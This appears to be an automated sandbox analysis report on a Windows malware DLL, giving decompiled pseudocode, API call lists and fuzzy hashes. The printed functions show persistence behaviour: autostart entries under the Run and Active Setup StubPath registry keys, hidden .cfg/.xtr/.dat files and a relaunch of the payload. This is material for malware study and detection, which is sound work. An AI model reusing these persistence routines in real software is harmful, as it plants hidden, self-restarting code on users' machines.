                  Instruction addresses: 0x10006026, 0x10006028, 0x1000603a, 0x1000603c, 0x1000603f, 0x10006045, 0x10006045, 0x1000604c, 0x10006055

                  APIs
                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 10006033
                  • TranslateMessage.USER32 ref: 1000603F
                  • DispatchMessageA.USER32 ref: 10006045
                  • Sleep.KERNEL32(00000005,?,?,10006062), ref: 1000604C
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Message$DispatchPeekSleepTranslate
                  • String ID:
                  • API String ID: 3768732053-0
                  • Opcode ID: cdfd25f36f656fbcf1ff338a95777bde3114a2653ddc5fdf0504e6a1debc9aed
                  • Instruction ID: b6454b735261936b655b95e10bb9b448ccac05162160f127df45d4e102083895
                  • Opcode Fuzzy Hash: cdfd25f36f656fbcf1ff338a95777bde3114a2653ddc5fdf0504e6a1debc9aed
                  • Instruction Fuzzy Hash: 8AD052B53C2A253AF520A1A00C83FAF004DCF02BC6F220030B700BA0CACE867C0102AE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 55%
                  			E100020BC(void* __eax) {
                  				intOrPtr _v8;
                  				void* __ebp;
                  				signed int* _t24;
                  				signed int* _t25;
                  				intOrPtr _t26;
                  				signed int* _t38;
                  				void* _t42;
                  				signed int _t43;
                  				signed int _t44;
                  				signed int _t51;
                  				intOrPtr _t52;
                  				signed int _t56;
                  				signed int* _t58;
                  				signed int* _t62;
                  				intOrPtr _t65;
                  				intOrPtr _t67;
                  
                  				_t65 = _t67;
                  				_t42 = __eax;
                  				 *0x1000f5b4 = 0;
                  				if( *0x1000f5b0 != 0 || E10001840() != 0) {
                  					_push(_t65);
                  					_push("�u");
                  					_push( *[fs:ecx]);
                  					 *[fs:ecx] = _t67;
                  					__eflags =  *0x1000f039;
                  					if( *0x1000f039 != 0) {
                  						_push(0x1000f5b8);
                  						L1000119C();
                  					}
                  					_t62 = _t42 - 4;
                  					_t43 =  *_t62;
                  					__eflags = _t43 & 0x00000002;
                  					if((_t43 & 0x00000002) != 0) {
                  						 *0x1000f5a0 =  *0x1000f5a0 - 1;
                  						 *0x1000f5a4 =  *0x1000f5a4 - (_t43 & 0x7ffffffc) - 4;
                  						__eflags = _t43 & 0x00000001;
                  						if((_t43 & 0x00000001) == 0) {
                  							L14:
                  							_t44 = _t43 & 0x7ffffffc;
                  							_t24 = _t62 + _t44;
                  							_t58 = _t24;
                  							__eflags = _t58 -  *0x1000f60c; // 0x0
                  							if(__eflags != 0) {
                  								_t51 =  *_t24;
                  								__eflags = _t51 & 0x00000002;
                  								if((_t51 & 0x00000002) == 0) {
                  									_t25 = _t58;
                  									__eflags = _t25[1];
                  									if(_t25[1] == 0) {
                  										L25:
                  										 *0x1000f5b4 = 0xb;
                  									} else {
                  										__eflags =  *_t25;
                  										if( *_t25 == 0) {
                  											goto L25;
                  										} else {
                  											__eflags = _t25[2] - 0xc;
                  											if(_t25[2] >= 0xc) {
                  												__eflags = _t44;
                  												E100019E4(_t25);
                  												goto L27;
                  											} else {
                  												goto L25;
                  											}
                  										}
                  									}
                  								} else {
                  									__eflags = (_t51 & 0x7ffffffc) - 4;
                  									if((_t51 & 0x7ffffffc) >= 4) {
                  										 *_t24 =  *_t24 | 0x00000001;
                  										L27:
                  										E10001C4C(_t62, _t44);
                  									} else {
                  										 *0x1000f5b4 = 0xb;
                  									}
                  								}
                  								goto L28;
                  							} else {
                  								 *0x1000f60c =  *0x1000f60c - _t44;
                  								 *0x1000f608 =  *0x1000f608 + _t44;
                  								__eflags =  *0x1000f608 - 0x3c00;
                  								if( *0x1000f608 > 0x3c00) {
                  									E10001CD4(_t24);
                  								}
                  								_v8 = 0;
                  								E10002D84();
                  								goto L32;
                  							}
                  						} else {
                  							_t56 =  *(_t62 - 0xc + 8);
                  							__eflags = _t56 - 0xc;
                  							if(_t56 < 0xc) {
                  								L10:
                  								 *0x1000f5b4 = 0xa;
                  								goto L28;
                  							} else {
                  								__eflags = _t56 & 0x80000003;
                  								if((_t56 & 0x80000003) == 0) {
                  									_t38 = _t62 - _t56;
                  									__eflags = _t56 - _t38[2];
                  									if(_t56 == _t38[2]) {
                  										_t43 = _t43 + _t56;
                  										__eflags = _t43;
                  										_t62 = _t38;
                  										E100019E4(_t38);
                  										goto L14;
                  									} else {
                  										 *0x1000f5b4 = 0xa;
                  										goto L28;
                  									}
                  								} else {
                  									goto L10;
                  								}
                  							}
                  						}
                  					} else {
                  						 *0x1000f5b4 = 9;
                  						L28:
                  						_t26 =  *0x1000f5b4; // 0x0
                  						_v8 = _t26;
                  						__eflags = 0;
                  						_pop(_t52);
                  						 *[fs:eax] = _t52;
                  						_push(E10002255);
                  						__eflags =  *0x1000f039;
                  						if( *0x1000f039 != 0) {
                  							_push(0x1000f5b8);
                  							L100011A4();
                  							return 0;
                  						}
                  						return 0;
                  					}
                  				} else {
                  					 *0x1000f5b4 = 8;
                  					_v8 = 8;
                  					L32:
                  					return _v8;
                  				}
                  			}



















                  Instruction addresses: 0x100020bd, 0x100020c3, 0x100020c7, 0x100020d3, 0x100020f6, 0x100020f7, 0x100020fc, 0x100020ff, 0x10002102, 0x10002109, 0x1000210b, 0x10002110, 0x10002110, 0x10002117, 0x1000211a, 0x1000211c, 0x1000211f, 0x10002130, 0x10002140, 0x10002146, 0x10002149, 0x10002190, 0x10002190, 0x10002198, 0x1000219a, 0x1000219c, 0x100021a2, 0x100021d0, 0x100021d2, 0x100021d5, 0x100021f3, 0x100021f5, 0x100021f9, 0x10002206, 0x10002206, 0x100021fb, 0x100021fb, 0x100021fe, 0x00000000, 0x10002200, 0x10002200, 0x10002204, 0x10002215, 0x10002217, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x10002204, 0x100021fe, 0x100021d7, 0x100021dd, 0x100021e0, 0x100021ee, 0x1000221c, 0x10002220, 0x100021e2, 0x100021e2, 0x100021e2, 0x100021e0, 0x00000000, 0x100021a4, 0x100021a4, 0x100021aa, 0x100021b0, 0x100021ba, 0x100021bc, 0x100021bc, 0x100021c3, 0x100021c6, 0x00000000, 0x100021c6, 0x1000214b, 0x10002150, 0x10002153, 0x10002156, 0x10002160, 0x10002160, 0x00000000, 0x10002158, 0x10002158, 0x1000215e, 0x10002171, 0x10002173, 0x10002176, 0x10002187, 0x10002187, 0x10002189, 0x1000218b, 0x00000000, 0x10002178, 0x10002178, 0x00000000, 0x10002178, 0x00000000, 0x00000000, 0x00000000, 0x1000215e, 0x10002156, 0x10002121, 0x10002121, 0x10002225, 0x10002225, 0x1000222a, 0x1000222d, 0x1000222f, 0x10002232, 0x10002235, 0x1000223a, 0x10002241, 0x10002243, 0x10002248, 0x00000000, 0x10002248, 0x1000224d, 0x1000224d, 0x100020de, 0x100020de, 0x100020e8, 0x10002255, 0x1000225d, 0x1000225d

                  APIs
                  • RtlEnterCriticalSection.KERNEL32(1000F5B8,00000000,u,?,00000000,?,00000000,?,?,10001AC9,10001ADE,10001C2F), ref: 10002110
                  • RtlLeaveCriticalSection.KERNEL32(1000F5B8,10002255,00000000,?,00000000,?,?,10001AC9,10001ADE,10001C2F), ref: 10002248
                    • Part of subcall function 10001840: RtlInitializeCriticalSection.KERNEL32(1000F5B8,00000000,100018F6,?,?,100020DA,00000000,?,00000000,?,?,10001AC9,10001ADE,10001C2F), ref: 10001856
                    • Part of subcall function 10001840: RtlEnterCriticalSection.KERNEL32(1000F5B8,1000F5B8,00000000,100018F6,?,?,100020DA,00000000,?,00000000,?,?,10001AC9,10001ADE,10001C2F), ref: 10001869
                    • Part of subcall function 10001840: LocalAlloc.KERNEL32(00000000,00000FF8,1000F5B8,00000000,100018F6,?,?,100020DA,00000000,?,00000000,?,?,10001AC9,10001ADE,10001C2F), ref: 10001893
                    • Part of subcall function 10001840: RtlLeaveCriticalSection.KERNEL32(1000F5B8,100018FD,00000000,100018F6,?,?,100020DA,00000000,?,00000000,?,?,10001AC9,10001ADE,10001C2F), ref: 100018F0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                  • String ID: u
                  • API String ID: 2227675388-1454174257
                  • Opcode ID: 0da6072e0a976cfb3f921da88b49d252e3528e262072c21df3c45306adc3dbea
                  • Instruction ID: 561d0a3fabbc271b0414227351a2afb4dd9cd87895bc161ef682a7dca5e6893d
                  • Opcode Fuzzy Hash: 0da6072e0a976cfb3f921da88b49d252e3528e262072c21df3c45306adc3dbea
                  • Instruction Fuzzy Hash: 8E413436A04660EFF311CFA4CD897A937E5EB443D4F24812DEA0087ABEC7349884E701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Executed Functions

                  C-Code - Quality: 49%
                  			E1000C9D0(intOrPtr _a4) {
                  				char _v8;
                  				char _v12;
                  				char _v16;
                  				char _v20;
                  				char _v24;
                  				char _v28;
                  				char _v32;
                  				intOrPtr _v40;
                  				intOrPtr _v44;
                  				char _v48;
                  				char _v52;
                  				char _v56;
                  				char _v60;
                  				char _v64;
                  				char _v68;
                  				char _v72;
                  				char _v76;
                  				char* _v80;
                  				char _v84;
                  				char _v88;
                  				void* _t103;
                  				void* _t115;
                  				void* _t117;
                  				void* _t119;
                  				intOrPtr _t151;
                  				void* _t152;
                  				char* _t178;
                  				void* _t188;
                  				void* _t191;
                  				void* _t192;
                  				void* _t193;
                  				intOrPtr _t195;
                  
                  				_t152 = 0xa;
                  				goto L1;
                  				while(1) {
                  					L5:
                  					_t199 =  *((char*)(_t151 + 0xdbc)) - 1;
                  					if( *((char*)(_t151 + 0xdbc)) == 1) {
                  						E100038E0( &_v76, 0x3d, _t151 + 0xc4e);
                  						E1000577C(0x80000002, _t151, _v76, _v28, _t192, _t199, 2, _v16);
                  					}
                  					_t200 =  *((char*)(_t151 + 0xdbd)) - 1;
                  					if( *((char*)(_t151 + 0xdbd)) == 1) {
                  						E100038E0( &_v80, 0x3d, _t151 + 0xcc8);
                  						_t164 = _v80;
                  						E1000577C(0x80000001, _t151, _v80, _v28, _t192, _t200, 2, _v16);
                  					}
                  					_t201 =  *((char*)(_t151 + 0xdbe)) - 1;
                  					if( *((char*)(_t151 + 0xdbe)) == 1) {
                  						_push(E1000390C(_v20));
                  						_push(0x80000001);
                  						L1000C070();
                  						_t164 = L"StubPath";
                  						E1000577C(0x80000002, _t151, L"StubPath", _v20, _t192, _t201, 2, _v16);
                  					}
                  					_t191 = E1000390C(_v16);
                  					_t115 = E10005CA4(_t191);
                  					_t202 = _t115;
                  					if(_t115 == 0) {
                  						E10005D78(_v16, _t151, _t164,  &_v84, _t191, _t192, _t202);
                  						if(E10005690(E1000390C(_v84)) != 0) {
                  							_push(_v40);
                  							_push(_v44);
                  							_t188 = E1000390C(_v24);
                  							E10005EB4(_t191, _t188);
                  							_t204 =  *((char*)(_t151 + 0xbd1)) - 1;
                  							if( *((char*)(_t151 + 0xbd1)) == 1) {
                  								E10005D78(_v16, _t151, _t164,  &_v88, _t191, _t192, _t204);
                  								E10005F1C(_v88, _t151, _t164, _t192);
                  								E10005F1C(_v16, _t151, _t164, _t192);
                  							}
                  						}
                  					}
                  					_t117 = E10004DF0(0, 0, _t151 + 0xfaa);
                  					_t193 = _t117;
                  					L10004E88();
                  					if(_t117 == 0xb7) {
                  						_push(_t193);
                  						L10004DC0();
                  					} else {
                  						_push(_t193);
                  						L10004DC0();
                  						_push(0);
                  						_push(0);
                  						_push(0);
                  						_push(_t191);
                  						_push(L"open");
                  						_push(0);
                  						L1000B6F8();
                  					}
                  					_push(0x1388);
                  					L10004F58();
                  					_t119 = E10004DF0(0, 0, _t151 + 0x1024);
                  					_t192 = _t119;
                  					L10004E88();
                  					if(_t119 != 0xb7) {
                  						_push(_t192);
                  						L10004DC0();
                  					} else {
                  						_push(0);
                  						L10004E38();
                  					}
                  				}
                  				L3:
                  				E100034B0( &_v56, 0x3d, _t151 + 0xfaa);
                  				E1000352C( &_v52, _v56, "SOFTWARE\\");
                  				E100038FC( &_v48, _v52);
                  				E1000553C(0x80000001, _t151, L"ServerName", _v48, _t192,  &_v16, 0);
                  				_push(0x3e8);
                  				L10004F58();
                  				E10003A34(_v16, 0);
                  				if(0 == 0) {
                  					goto L3;
                  				} else {
                  					E100034B0( &_v64, 0x3d, _t151 + 0xfaa);
                  					E1000352C( &_v60, _v64, "SOFTWARE\\");
                  					E100038FC( &_v8, _v60);
                  					E100037D0( &_v12, L"ServerName");
                  					_push(E1000390C(_v12));
                  					_push(E1000390C(_v8));
                  					_push(0x80000001);
                  					L1000C078();
                  					E100037D0( &_v28, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run");
                  					E100034B0( &_v72, 0x3d, _t151 + 0xd42);
                  					E1000352C( &_v68, _v72, "Software\\Microsoft\\Active Setup\\Installed Components\\");
                  					E100038FC( &_v20, _v68);
                  					_t103 = E1000390C(_v16);
                  					_t178 =  &_v32;
                  					_v44 = E10005E30(_t103, _t178);
                  					_v40 = _t178;
                  					E10003BE4( &_v24, E10003FD4(_v44, _v40, 2, 0));
                  					E100050D0(E1000390C(_v24), _v32);
                  					goto L5;
                  				}
                  				L1:
                  				_push(0);
                  				_push(0);
                  				_t152 = _t152 - 1;
                  				if(_t152 != 0) {
                  					goto L1;
                  				} else {
                  					_push(_t152);
                  					_push(_t192);
                  					_t151 = _a4;
                  					_push(0x1000cd6b);
                  					_push( *[fs:eax]);
                  					 *[fs:eax] = _t195;
                  					_push("advapi32.dll"); // executed
                  					L10004EE8(); // executed
                  					_push("kernel32.dll");
                  					L10004EE8();
                  					_push("shell32.dll"); // executed
                  					L10004EE8(); // executed
                  					_push("mpr.dll"); // executed
                  					L10004EE8(); // executed
                  					_push("version.dll"); // executed
                  					L10004EE8(); // executed
                  					_push("comctl32.dll"); // executed
                  					L10004EE8(); // executed
                  					_push("gdi32.dll");
                  					L10004EE8();
                  					_push("opengl32.dll"); // executed
                  					L10004EE8(); // executed
                  					_push("user32.dll");
                  					L10004EE8();
                  					_push("wintrust.dll"); // executed
                  					L10004EE8(); // executed
                  					_push("msimg32.dll"); // executed
                  					L10004EE8(); // executed
                  					_push("shell32.dll");
                  					L10004EE8();
                  					E10004DF0(0, 0, _t151 + 0x109e); // executed
                  					goto L3;
                  				}
                  			}

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: SOFTWARE\$ServerName$Software\Microsoft\Active Setup\Installed Components\$Software\Microsoft\Windows\CurrentVersion\Run$StubPath$advapi32.dll$comctl32.dll$gdi32.dll$kernel32.dll$mpr.dll$msimg32.dll$open$opengl32.dll$shell32.dll$user32.dll$version.dll$wintrust.dll
                  • API String ID: 0-1620131929
                  • Opcode ID: 3f003b5c3092192cfd81708055f069769660bd1ffedbc504d52b734bcf9630d0
                  • Instruction ID: 2f4b2620837c28cfdf5e49335ff29dada521f5c21c6ac21027946eb6f57ed48d
                  • Opcode Fuzzy Hash: 3f003b5c3092192cfd81708055f069769660bd1ffedbc504d52b734bcf9630d0
                  • Instruction Fuzzy Hash: 20911F78A4024DABFB01EBA4D882FDE7779EF442C1F118162F9046B28ECB75BD058765
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f70b2c41885a2b75705e30fc840686dfb1265623bc9199f295252585e81511e0
                  • Instruction ID: 0d43bb01e54dc9b671ab70bbc6831eaed9bab68177c8673266180e336cb24133
                  • Opcode Fuzzy Hash: f70b2c41885a2b75705e30fc840686dfb1265623bc9199f295252585e81511e0
                  • Instruction Fuzzy Hash: 9211E135B0864657F323C969ACC086BA3CEDFC41E0B14C439B964C734ADEA9ED099241
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 658d5346f56e2b90820d1a4238b762dd8e40d303793816f207723b6d5c2275ec
                  • Instruction ID: 376a20137c8c7a1c0fe805d4ca5c7b4e53bfabd2decc6611af020c1a5c038b4e
                  • Opcode Fuzzy Hash: 658d5346f56e2b90820d1a4238b762dd8e40d303793816f207723b6d5c2275ec
                  • Instruction Fuzzy Hash: 42117076A05B029BE310DF19CC80A9AB7E1EBC47D2F15C52CE6894B759D630EC408A81
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9d51b0ecb197f6104a2e181751b16b33db407c9c73752bb5c84ac1d3e4f38b51
                  • Instruction ID: a9c88282e432f8f48e60550f2442f7a71b9eebfe68f090cfd9eaf30bd27f6b92
                  • Opcode Fuzzy Hash: 9d51b0ecb197f6104a2e181751b16b33db407c9c73752bb5c84ac1d3e4f38b51
                  • Instruction Fuzzy Hash: 82F0A7B6B0062027F730C9694C81BCA66C5DF86BE1F154270FF48EF7CEDA619C0082A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f526a8682a1746ab478b9ff0de63cbf056aa175396c796edc7b027d709aef71d
                  • Instruction ID: c2faabbd69db4d94be3e596462244fa43c21c6edc70b3a96aead2daf1922e93e
                  • Opcode Fuzzy Hash: f526a8682a1746ab478b9ff0de63cbf056aa175396c796edc7b027d709aef71d
                  • Instruction Fuzzy Hash: 9EC012B22802083EF600CA88CC46FB3329CC348B80F008108F704CA180C0A1BC2046B8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                  • Instruction ID: 5a3873c4f99191ebd0c5874248a48e85116967648e1c4cce01420d804b7247f1
                  • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                  • Instruction Fuzzy Hash: 20C012B71A024CAB8B00EEA9CC06D9B33DCAB28609B008825B928CB100C539E5909B60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8bafc26852eecdc6c12b55ba738ab9fa026e6a82810d81ad4c3fd3d0f1dab815
                  • Instruction ID: ca28794199431f72530e799d36250414a245c489da467331e40bdcc928d85e60
                  • Opcode Fuzzy Hash: 8bafc26852eecdc6c12b55ba738ab9fa026e6a82810d81ad4c3fd3d0f1dab815
                  • Instruction Fuzzy Hash: 6BC08CFC1052022CBF0AAB3148859BB639CEF801C13408068BA04C4008D634E8814020
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  C-Code - Quality: 53%
                  			E1000C080(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                  				char _v8;
                  				char _v12;
                  				intOrPtr _v16;
                  				char _v20;
                  				intOrPtr _v24;
                  				char _v28;
                  				char _v40;
                  				char _v162;
                  				char _v164;
                  				intOrPtr _v168;
                  				char _v290;
                  				char _v412;
                  				char _v534;
                  				char _v656;
                  				char _v658;
                  				char _v659;
                  				char _v660;
                  				char _v1026;
                  				char _v1028;
                  				char _v2011;
                  				char _v2012;
                  				void _v5036;
                  				char _v5040;
                  				char _v5564;
                  				char _v5568;
                  				char _v5572;
                  				char _v5576;
                  				char _v5580;
                  				char _v5584;
                  				char _v5588;
                  				char _v5592;
                  				char _v5596;
                  				char _v5600;
                  				char _v5604;
                  				char _v5608;
                  				char _v5612;
                  				char _v5616;
                  				char _v5620;
                  				char _v5624;
                  				char _v5628;
                  				char _v5632;
                  				char _v5636;
                  				char _v5640;
                  				char _v5644;
                  				char _v5648;
                  				char _v5652;
                  				char _v5656;
                  				char _v5660;
                  				char _v5664;
                  				char _v5668;
                  				char _v5672;
                  				char _v5676;
                  				void* _t153;
                  				intOrPtr _t188;
                  				intOrPtr _t195;
                  				intOrPtr _t197;
                  				char* _t199;
                  				intOrPtr _t200;
                  				intOrPtr _t202;
                  				intOrPtr _t204;
                  				intOrPtr* _t206;
                  				char* _t207;
                  				char* _t208;
                  				intOrPtr _t209;
                  				intOrPtr _t211;
                  				intOrPtr _t214;
                  				char* _t217;
                  				void* _t223;
                  				void* _t273;
                  				void* _t287;
                  				intOrPtr _t328;
                  				void* _t330;
                  				intOrPtr* _t403;
                  				intOrPtr _t412;
                  				intOrPtr _t419;
                  				intOrPtr _t446;
                  				void* _t448;
                  				void* _t449;
                  				intOrPtr _t451;
                  				intOrPtr _t452;
                  				void* _t460;
                  
                  				_t451 = _t452;
                  				_t330 = 0x2c5;
                  				do {
                  					_push(0);
                  					_push(0);
                  					_t330 = _t330 - 1;
                  					_t455 = _t330;
                  				} while (_t330 != 0);
                  				_push(__ebx);
                  				_push(__esi);
                  				_push(__edi);
                  				_t328 = _a4;
                  				_push(_t451);
                  				_push(0x1000c850);
                  				_push( *[fs:eax]);
                  				 *[fs:eax] = _t452;
                  				_push("advapi32.dll");
                  				L10004EE8();
                  				_push("kernel32.dll");
                  				L10004EE8();
                  				_push("shell32.dll");
                  				L10004EE8();
                  				_push("mpr.dll");
                  				L10004EE8();
                  				_push("version.dll");
                  				L10004EE8();
                  				_push("comctl32.dll");
                  				L10004EE8();
                  				_push("gdi32.dll");
                  				L10004EE8();
                  				_push("opengl32.dll");
                  				L10004EE8();
                  				_push("user32.dll");
                  				L10004EE8();
                  				_push("wintrust.dll");
                  				L10004EE8();
                  				L10004EE8();
                  				E100050D8();
                  				_t448 = _t328 + 0x210;
                  				memcpy( &_v5036, _t448, 0x4e4 << 2);
                  				_t446 = _t448 + 0x9c8;
                  				E10005664( &_v5564);
                  				E100038E0( &_v5040, 0x105,  &_v5564);
                  				E10003928( &_v5040, 0x105, L"\\Microsoft\\Windows\\", _t455);
                  				_t153 = E10005690(E1000390C(_v5040), "msimg32.dll");
                  				_t456 = _t153 - 1;
                  				if(_t153 != 1) {
                  					E10005664( &_v5564);
                  					E100038E0( &_v5592, 0x105,  &_v5564);
                  					_push(_v5592);
                  					_push(0x1000c958);
                  					E100038E0( &_v5596, 0x3d,  &_v1026);
                  					_push(_v5596);
                  					_push(L".cfg");
                  					E100039EC();
                  					E10005664( &_v5564);
                  					E100038E0( &_v5600, 0x105,  &_v5564);
                  					_push(_v5600);
                  					_push(0x1000c958);
                  					E100038E0( &_v5604, 0x3d,  &_v1026);
                  					_push(_v5604);
                  					_push(L".xtr");
                  					E100039EC();
                  					E10005664( &_v5564);
                  					E100038E0( &_v5608, 0x105,  &_v5564);
                  					_push(_v5608);
                  					_push(0x1000c958);
                  					E100038E0( &_v5612, 0x3d,  &_v1026);
                  					_push(_v5612);
                  					_push(L".dat");
                  					E100039EC();
                  				} else {
                  					E10005664( &_v5564);
                  					E100038E0( &_v5568, 0x105,  &_v5564);
                  					_push(_v5568);
                  					_push(L"\\Microsoft\\Windows\\");
                  					E100038E0( &_v5572, 0x3d,  &_v1026);
                  					_push(_v5572);
                  					_push(L".cfg");
                  					E100039EC();
                  					E10005664( &_v5564);
                  					E100038E0( &_v5576, 0x105,  &_v5564);
                  					_push(_v5576);
                  					_push(L"\\Microsoft\\Windows\\");
                  					E100038E0( &_v5580, 0x3d,  &_v1026);
                  					_push(_v5580);
                  					_push(L".xtr");
                  					E100039EC();
                  					E10005664( &_v5564);
                  					E100038E0( &_v5584, 0x105,  &_v5564);
                  					_push(_v5584);
                  					_push(L"\\Microsoft\\Windows\\");
                  					E100038E0( &_v5588, 0x3d,  &_v1026);
                  					_push(_v5588);
                  					_push(L".dat");
                  					E100039EC();
                  				}
                  				E10006B14(0x2f, _t328, 0x3a, 0x20, _t446, _t448,  &_v5616);
                  				E100034B0( &_v5628, 0x3d,  &_v1026);
                  				E1000352C( &_v5624, _v5628, "SOFTWARE\\");
                  				E100038FC( &_v5620, _v5624);
                  				E1000577C(0x80000001, _t328, L"ServerStarted", _v5620, _t448, _t456, 2, _v5616);
                  				_t188 = E10004DF0(0, 0,  &_v1026);
                  				_v24 = _t188;
                  				L10004E88();
                  				if(_t188 == 0xb7) {
                  					_push(0);
                  					L10004E38();
                  				}
                  				E100038E0( &_v5632, 0x105, _t328);
                  				_t345 =  &_v8;
                  				E100099F8(_t328,  &_v8,  &_v5036, _t446, _t448);
                  				E10009E74(_t328,  &_v5036, _t446, _t448);
                  				_t458 = _v2011 - 1;
                  				if(_v2011 == 1) {
                  					E10005D78(_v8, _t328,  &_v8,  &_v5636, _t446, _t448, _t458);
                  					E10005F1C(_v5636, _t328,  &_v8, _t448);
                  					E10005F1C(_v8, _t328, _t345, _t448);
                  				}
                  				_t459 = _v1028 - 1;
                  				if(_v1028 == 1) {
                  					E100034B0( &_v5648, 0x3d,  &_v1026);
                  					E1000352C( &_v5644, _v5648, "SOFTWARE\\");
                  					E100038FC( &_v5640, _v5644);
                  					E1000577C(0x80000001, _t328, L"ServerName", _v5640, _t448, _t459, 2, _v8);
                  				}
                  				_t460 = _v2012 - 1;
                  				if(_t460 == 0) {
                  					E100038E0( &_v5652, 0x105, _t328);
                  					E10003A34(_v5652, _v8);
                  					if(_t460 != 0) {
                  						E100038E0( &_v5656, 0x105, _t328);
                  						_push(_v5656);
                  						E10005954(0,  &_v5660);
                  						_pop(_t287);
                  						E10003A34(_t287, _v5660);
                  						if(0 != 0) {
                  							_t448 = 0;
                  							while(1) {
                  								_t446 = _t328;
                  								if(E10005CA4(_t446) != 1 || _t448 >= 5) {
                  									goto L18;
                  								}
                  								_push(0x80);
                  								_push(_t446);
                  								L10004F30();
                  								_push(_t446);
                  								L10004E30();
                  								_push(0x1f4);
                  								L10004F58();
                  								_t448 = _t448 + 1;
                  								__eflags = _t448;
                  							}
                  						}
                  					}
                  				}
                  				L18:
                  				_t195 =  *0x1000e10c; // 0x1000f80c
                  				E10003770(_t195);
                  				_t197 =  *0x1000e12c; // 0x1000f6a4
                  				E100038E0(_t197, 0x3d,  &_v656);
                  				_t199 =  *0x1000e120; // 0x1000f6c2
                  				 *_t199 = _v659;
                  				_t200 =  *0x1000e100; // 0x1000f6a8
                  				E100038E0(_t200, 0x3d,  &_v534);
                  				_t202 =  *0x1000e110; // 0x1000f6ac
                  				E100038E0(_t202, 0x3d,  &_v412);
                  				_t204 =  *0x1000e114; // 0x1000f6b0
                  				E100038E0(_t204, 0x3d,  &_v290);
                  				_t206 =  *0x1000e11c; // 0x1000f6bc
                  				 *_t206 = _v168;
                  				_t207 =  *0x1000e124; // 0x1000f6c0
                  				 *_t207 = _v164;
                  				_t208 =  *0x1000e118; // 0x1000f6c1
                  				 *_t208 = _v658;
                  				_t209 =  *0x1000e108; // 0x1000f6b4
                  				E100038E0(_t209, 0x3d,  &_v1026);
                  				_t211 =  *0x1000e104; // 0x1000f6b8
                  				E100038E0(_t211, 0x3d,  &_v162);
                  				if(_v660 == 1) {
                  					E100093E4(_t328, _t446, _t448);
                  				}
                  				if(_v40 == 1) {
                  					E1000A480(E1000B634(_t328, _v8, 1, _t448));
                  				}
                  				_t214 =  *0x1000a4e8; // 0x1000a534
                  				E1000A480(E1000AA54(_t214, _t328,  &_v5036, 1, _t446, _t448, _v20));
                  				while(1) {
                  					_t217 =  *0x1000e130; // 0x1000e0bc
                  					_t466 =  *_t217;
                  					if( *_t217 != 0) {
                  						break;
                  					}
                  					E10006058();
                  				}
                  				E10008D4C(_t217);
                  				_t403 =  *0x1000e10c; // 0x1000f80c
                  				E100037D0( &_v12,  *_t403);
                  				_push(0x80);
                  				_t223 = E1000390C(_v16);
                  				_t329 = _t223;
                  				_push(_t223);
                  				L10004F30();
